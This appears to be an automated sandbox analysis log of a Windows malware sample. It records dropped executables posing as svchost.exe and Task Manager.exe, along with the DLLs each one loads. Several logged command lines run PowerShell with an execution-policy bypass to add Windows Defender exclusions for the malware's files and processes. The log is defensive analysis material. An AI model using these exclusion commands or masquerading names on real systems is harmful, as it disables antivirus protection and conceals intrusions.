Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd | Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd | Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Process created: C:\Users\user\AppData\Roaming\All function.cmd "C:\Users\user\AppData\Roaming\All function.cmd"
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd | Process created: C:\Users\user\AppData\Roaming\Task Manager.exe "C:\Users\user\AppData\Roaming\Task Manager.exe"
Source: C:\Users\user\AppData\Roaming\All function.cmd | Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe'
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe'
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe"
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe'
Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\All function.cmd | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Task Manager.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\All function.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3dcompiler_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: d3dx11_43.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeSection loaded: iertutil.dllJump to behavior
